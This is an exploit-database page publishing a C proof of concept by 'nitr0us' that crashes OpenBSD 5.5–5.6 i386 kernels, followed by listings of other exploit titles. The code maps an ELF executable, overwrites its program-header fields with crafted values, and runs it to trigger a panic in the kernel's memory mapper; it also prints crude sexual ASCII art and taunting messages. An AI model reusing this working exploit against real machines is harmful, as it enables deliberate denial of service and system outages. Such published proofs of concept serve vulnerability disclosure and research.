Menu

Search for hundreds of thousands of exploits

"OpenBSD 5.6 - Multiple Local Kernel Panics (Denial of Service)"

Author

Exploit author

nitr0us

Platform

Exploit platform

bsd

Release date

Exploit published date

2015-04-21

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
/*

# Exploit Title: OpenBSD <= 5.6 - Multiple Local Kernel Panics
# Exploit Author: nitr0us
# Vendor Homepage: http://www.openbsd.org
# Version: 5.6
# Tested on: OpenBSD 5.6 i386 (snapshot - Nov 25th, 2014), OpenBSD 5.6 i386, OpenBSD 5.5 i386

 * - 0xb16b00b5.c
 *
 * - Alejandro Hernandez (@nitr0usmx)
 * - Mexico 2015
 *
 * #########################################################################
 * #         OpenBSD <= 5.6 kernel panic()'s in sys/uvm/uvm_map.c          #
 * #########################################################################
 *
 * Tested under:
 * - OpenBSD 5.6 i386 (snapshot - Nov 25th, 2014)
 * - OpenBSD 5.6 i386
 * - OpenBSD 5.5 i386
 *
 * https://www.youtube.com/watch?feature=player_detailpage&v=PReopSQZOrY#t=20
 *
 */

#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys/param.h>
#include <sys/types.h>

#ifndef  __OpenBSD__
	#error "Not OpenBSD !!!1111";
#else
#include <sys/exec_elf.h>
#endif

#ifndef __i386__
	#error "Not i386 !!!1111";
#endif

char big_b00bz[] =
"       8M:::::::8888M:::::888:::::::88:::8888888::::::::Mm\n"
"      88MM:::::8888M:::::::88::::::::8:::::888888:::M:::::M\n"
"     8888M:::::888MM::::::::8:::::::::::M::::8888::::M::::M\n"
"    88888M:::::88:M::::::::::8:::::::::::M:::8888::::::M::M\n"
"   88 888MM:::888:M:::::::::::::::::::::::M:8888:::::::::M:\n"
"   8 88888M:::88::M:::::::::::::::::::::::MM:88::::::::::::M\n"
"     88888M:::88::M::::::::::*88*::::::::::M:88::::::::::::::M\n"
"    888888M:::88::M:::::::::88@@88:::::::::M::88::::::::::::::M\n"
"    888888MM::88::MM::::::::88@@88:::::::::M:::8::::::::::::::*8\n"
"    88888  M:::8::MM:::::::::*88*::::::::::M:::::::::::::::::88@@\n"
"    8888   MM::::::MM:::::::::::::::::::::MM:::::::::::::::::88@@\n"
"     888    M:::::::MM:::::::::::::::::::MM::M::::::::::::::::*8\n"
"     888    MM:::::::MMM::::::::::::::::MM:::MM:::::::::::::::M\n"
"      88     M::::::::MMMM:::::::::::MMMM:::::MM::::::::::::MM\n"
"       88    MM:::::::::MMMMMMMMMMMMMMM::::::::MMM::::::::MMM\n"
"        88    MM::::::::::::MMMMMMM::::::::::::::MMMMMMMMMM\n"
"         88   8MM::::::::::::::::::::::::::::::::::MMMMMM\n"
"          8   88MM::::::::::::::::::::::M:::M::::::::MM\n"
"              888MM::::::::::::::::::MM::::::MM::::::M";

int main(int argc, char **argv)
{
	Elf32_Ehdr *hdr;
	Elf32_Phdr *pht; 
	struct stat statinfo;
	char *elfptr;
	int fd;

	if(argc != 2) return printf("Usage: %s <elf_exec>\n", argv[0]);
	fd = open(argv[1], O_RDWR);
	fstat(fd, &statinfo);
	elfptr = (char *) mmap(NULL, statinfo.st_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
	hdr = (Elf32_Ehdr *) (elfptr);
	pht = (Elf32_Phdr *) (elfptr + hdr->e_phoff);
	printf("%s", big_b00bz);
	pht[9].p_type   = 0x7defaced; // <--- these overwrites ------------v
	pht[2].p_filesz = (arc4random() % 2) ? 0x41414141 : 0x43434343; // are necessary
	sleep(3 + (arc4random() % 3));
	if(arc4random() % 3 == 2) puts(" .. I like b1g 0nez !!"); // 33.33% chance
	else { if(arc4random() % 2){ puts(" .. want s0me ?!"); pht[5].p_vaddr = 0xb16b00b5; } // .6666 * .5 = 33.33% chance
	else { puts(" .. j00 like it ?!"); pht[5].p_vaddr = 0x0ace55e8; }} // .6666 * .5 = 33.33% chance
	msync(elfptr, 0, MS_ASYNC);
	munmap(elfptr, statinfo.st_size);
	close(fd);
	sleep(3 + (arc4random() % 3));
	system(argv[1]); // ( o )( o )   panic()
	puts("... s0rry, this piece of sh1t didn't w0rk in j00r obsd\n");
	return 0xDEFECA7E;
}
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2018-11-06 "Morris Worm - fingerd Stack Buffer Overflow (Metasploit)" remote bsd Metasploit
2016-07-21 "NetBSD - 'mail.local(8)' Local Privilege Escalation" local bsd akat1
2015-09-28 "Watchguard XCS - FixCorruptMail Privilege Escalation (Metasploit)" local bsd Metasploit
2015-09-28 "Watchguard XCS - Remote Command Execution (Metasploit)" remote bsd Metasploit
2015-04-21 "OpenBSD 5.6 - Multiple Local Kernel Panics (Denial of Service)" dos bsd nitr0us
2014-12-02 "tnftp (FreeBSD 8/9/10) - 'tnftp' Client Side" remote bsd dash
2014-11-06 "Citrix Netscaler SOAP Handler - Remote Code Execution (Metasploit)" remote bsd Metasploit
2014-10-25 "OpenBSD 5.5 - Local Kernel Panic (Denial of Service)" dos bsd nitr0us
2012-11-22 "OpenBSD 4.x - Portmap Remote Denial of Service" dos bsd auto236751
2012-07-01 "BSD - 'TelnetD' Remote Command Execution (2)" remote bsd kingcope
Release Date Title Type Platform Author
2015-08-12 "NeuroServer 0.7.4 - EEG TCP/IP Transceiver Remote Denial of Service" dos linux nitr0us
2015-04-21 "OpenBSD 5.6 - Multiple Local Kernel Panics (Denial of Service)" dos bsd nitr0us
2014-11-19 "Minix 3.3.0 - Remote TCP/IP Stack Denial of Service" dos linux nitr0us
2014-11-06 "Minix 3.3.0 - Local Denial of Service (PoC)" dos linux nitr0us
2014-10-25 "OpenBSD 5.5 - Local Kernel Panic (Denial of Service)" dos bsd nitr0us
2012-12-20 "gdb (GNU debugger) 7.5.1 - Null Pointer Dereference" dos linux nitr0us
2012-12-20 "IDA Pro 6.3 - Crash (PoC)" dos multiple nitr0us
2011-09-22 "Blue Coat Reporter - Directory Traversal" remote hardware nitr0us
2010-11-01 "Mongoose Web Server 2.11 - Directory Traversal" remote windows nitr0us
2010-11-01 "Yaws 1.89 - Directory Traversal" remote windows nitr0us
2009-09-25 "Cisco ACE XML Gateway 6.0 - Internal IP Disclosure" remote hardware nitr0us
2007-07-07 "NeoTracePro 3.25 - ActiveX 'TraceTarget()' Remote Buffer Overflow" remote windows nitr0us
2007-01-04 "Acunetix WVS 4.0 20060717 - HTTP Sniffer Component Remote Denial of Service" dos windows nitr0us
2006-05-26 "tiffsplit (libtiff 3.8.2) - Local Stack Buffer Overflow" local linux nitr0us
2006-04-02 "mpg123 0.59r - Malformed .mp3 (SIGSEGV) (PoC)" dos linux nitr0us
2005-09-12 "Snort 2.4.0 - SACK TCP Option Error Handling Denial of Service" dos multiple nitr0us 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected